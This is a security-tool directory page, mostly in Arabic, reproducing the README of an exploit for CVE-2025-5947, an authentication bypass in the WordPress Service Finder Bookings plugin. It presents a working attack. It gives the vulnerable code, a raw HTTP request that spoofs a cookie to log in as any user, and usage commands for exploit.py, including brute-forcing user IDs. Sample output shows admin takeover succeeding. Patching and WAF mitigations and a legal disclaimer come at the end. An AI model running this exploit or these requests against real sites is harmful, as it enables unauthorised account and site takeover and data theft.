Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-5947 — CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 إكسبلويت | Kitploit
أدوات/GitHubGitHub/xxconi/cve-2025-5947
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubxxconi/cve-2025-5947

CVE-2025-5947

CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 إكسبلويت

عرض المستودع
5منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-5947

CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 Exploit

CVE-2025-5947 Exploit - Service Finder Bookings

License Python Status CVSS

أداة استغلال لثغرة تجاوز المصادقة في إضافة Service Finder Bookings ≤ 6.0

📋 المحتويات

  • حول الثغرة
  • التفاصيل التقنية
  • التثبيت
  • الاستخدام
  • أمثلة
  • النتائج
  • الأمان
  • المصادر

🔴 حول الثغرة

CVE-2025-5947

توجد ثغرة حرجة في تجاوز المصادقة في إضافة Service Finder Bookings لإصدارات 6.0 والإصدارات الأقدم.

🎯 التأثير

يمكن للمهاجمين غير المصادق عليهم:

  • ✅ تسجيل الدخول كأي مستخدم
  • ✅ الوصول إلى حسابات المسؤول
  • ✅ الحصول على سيطرة كاملة على النظام
  • ✅ تسريب البيانات
  • ✅ تحميل تعليمات برمجية ضارة

🔍 التفاصيل التقنية

سبب الثغرة

توجد مصادقة غير كافية للكوكيز في الدالة service_finder_switch_back():

root@kitploit:~
// كود غير آمن
if(isset($_COOKIE['original_user_id'])) {
    $user_id = $_COOKIE['original_user_id'];
    wp_set_current_user($user_id);
    // لا يوجد تحقق!
}

ناقل الهجوم

root@kitploit:~
GET /wp-admin/admin-ajax.php?action=service_finder_switch_back HTTP/1.1
Host: target.com
Cookie: original_user_id=1

خصائص الهجوم:

  • 🌐 وصول عن بُعد (AV:N)
  • 🔓 لا حاجة للمصادقة (PR:N)
  • 👤 لا تفاعل مستخدم (UI:N)
  • 📊 تأثير كامل (C:H, I:H, A:H)

📦 التثبيت

المتطلبات

  • Python 3.6+
  • مكتبة requests

الخطوة 1: استنساخ المستودع

root@kitploit:~
git clone https://github.com/xxconi/CVE-2025-5947.git
cd CVE-2025-5947

الخطوة 2: تثبيت التبعيات

root@kitploit:~
pip install -r requirements.txt

الخطوة 3: التشغيل

root@kitploit:~
python exploit.py -u http://target.com

🚀 الاستخدام

الأوامر الأساسية

root@kitploit:~
# عرض المساعدة
python exploit.py -h

# محاولة الدخول كمسؤول (ID=1)
python exploit.py -u http://target.com

# مع معرف مستخدم محدد
python exploit.py -u http://target.com -i 5

# القوة العمياء (ID 1-10)
python exploit.py -u http://target.com -b 1-10

# بدون التحقق من SSL
python exploit.py -u http://target.com --no-ssl-verify

# مع مهلة زمنية مخصصة
python exploit.py -u http://target.com -t 30

المعلمات

💡 أمثلة

مثال 1: استغلال بسيط

root@kitploit:~
python exploit.py -u http://wordpress.local

المخرجات:

root@kitploit:~
============================================================
CVE-2025-5947 Service Finder Bookings Exploit
Authentication Bypass via Cookie Spoofing
============================================================
✅ Service Finder Bookings eklentisi bulundu

🔍 Kullanıcı ID 1 ile giriş denemesi yapılıyor...
📊 HTTP Status: 302
📋 Response Headers:
   Location: http://wordpress.local/wp-admin/
   Set-Cookie: wordpress_logged_in_abc123=...

✅ BAŞARILI! Admin olarak giriş yapıldı!
📍 Yönlendirme: http://wordpress.local/wp-admin/

مثال 2: القوة العمياء

root@kitploit:~
python exploit.py -u http://target.com -b 1-20

المخرجات:

root@kitploit:~
🔄 Brute Force Başlıyor (20 kullanıcı)...
✅ Kullanıcı ID 1: BAŞARILI
❌ Kullanıcı ID 2: Başarısız
✅ Kullanıcı ID 3: BAŞARILI
...
✅ Başarılı Kullanıcılar: [1, 3, 5]

مثال 3: HTTPS بدون التحقق من SSL

root@kitploit:~
python exploit.py -u https://target.com --no-ssl-verify

📊 النتائج

يتضمن الاستغلال الناجح المؤشرات التالية:

✅ كود استجابة HTTP 301 أو 302
✅ وجود /wp-admin/ في Header Location
✅ وجود wordpress_logged_in_ في Header Set-Cookie

🛡️ الأمان

⚠️ تحذير قانوني

هذه الأداة مخصصة فقط لـ:

  • ✅ اختبارات الأمان المصرح بها
  • ✅ على أنظمتك الخاصة
  • ✅ بإذن كتابي

يجب استخدامها بهذه الطريقة. الكاتب غير مسؤول.

🔐 طرق الحماية

  1. التحديث الفوري

    root@kitploit:~
    # التحديث من لوحة تحكم WordPress
    # أو باستخدام WP-CLI
    wp plugin update sf-booking
    
  2. تعطيل الإضافة

    root@kitploit:~
    wp plugin deactivate sf-booking
    
  3. حذف الإضافة

    root@kitploit:~
    wp plugin delete sf-booking
    
  4. جدار حماية تطبيقات الويب (WAF)

    root@kitploit:~
    Block: /wp-admin/admin-ajax.php?action=service_finder_switch_back
    
  5. الفحص الأمني

    • التحقق من حسابات المسؤول
    • مراجعة سجلات الوصول
    • البحث عن دخول غير مصرح به

📚 المصادر

  • قاعدة بيانات Patchstack
  • إعلان GitHub
  • تفاصيل NVD
  • الاستغلال الأصلي
  • حاسبة CVSS

🤝 المساهمة

للتبليغ عن الأخطاء أو اقتراح التحسينات:

  1. قم بعمل Fork
  2. أنشئ فرع ميزة (git checkout -b feature/improvement)
  3. قم بعمل Commit (git commit -am 'Add improvement')
  4. ادفع (git push origin feature/improvement)
  5. افتح Pull Request

📄 الترخيص

MIT License - راجع ملف LICENSE للتفاصيل

👤 المؤلف

باحث أمني

  • GitHub: @yourusername

🙏 الشكر

  • فريق أمان Patchstack
  • مجتمع أمان WordPress
  • منسقو CVE

⭐ إذا وجدتها مفيدة، قم بإعطاء نجمة!

🔝 العودة إلى الأعلى

تنزيل الأداة
الميزةالقيمة
CVE IDCVE-2025-5947
الإضافةService Finder Bookings (sf-booking)
الإصدار المتأثر≤ 6.0
الشدة🔴 حرج
نقاط CVSS9.8
CWECWE-639 (تجاوز التفويض)
نقاط EPSS0.617 (النسبة المئوية 98.357)
تاريخ النشر2025
المعلمةالاختصارالوصفالافتراضي
--url-uعنوان الهدف (إجباري)-
--user-id-iمعرف المستخدم1
--brute-force-bنطاق القوة العمياء (1-10)-
--no-ssl-verify-تعطيل التحقق من SSLFalse
--timeout-tمهلة الطلب (بالثواني)10